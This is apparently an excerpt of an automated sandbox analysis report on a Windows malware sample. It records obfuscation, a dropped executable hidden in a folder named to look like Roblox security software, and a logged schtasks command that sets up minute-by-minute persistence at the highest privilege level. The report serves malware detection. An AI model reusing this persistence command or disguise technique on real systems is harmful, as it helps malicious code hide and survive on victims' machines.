Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831EneJ source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: winload_prod.pdbWINLOA~1.PDBWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*0 source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Management.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Drawing.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2E source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\Boss\Desktop\Laps\Laps\obj\Release\Laps.pdb source: jqOHOuPMJP.exe
Source:	Binary string: System.Management.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Core.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831o source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831n source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbR source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD0C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: ntkrnlmp.pdbl source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr

Binary contains a suspicious time stamp

Source: jqOHOuPMJP.exe

Static PE information: 0x8F4114C5 [Wed Feb 28 05:04:05 2046 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_067EE438 pushad ; iretd	0_2_067EE445
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_067E648F push es; ret	0_2_067E6490
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_067E6592 push esp; ret	0_2_067E6599
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_067E7162 push eax; retf	0_2_067E7169
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04F5632D push eax; ret	1_2_04F56341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04F53A9B push ebx; retf	1_2_04F53ADA

Drops PE files

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	File created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	File created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
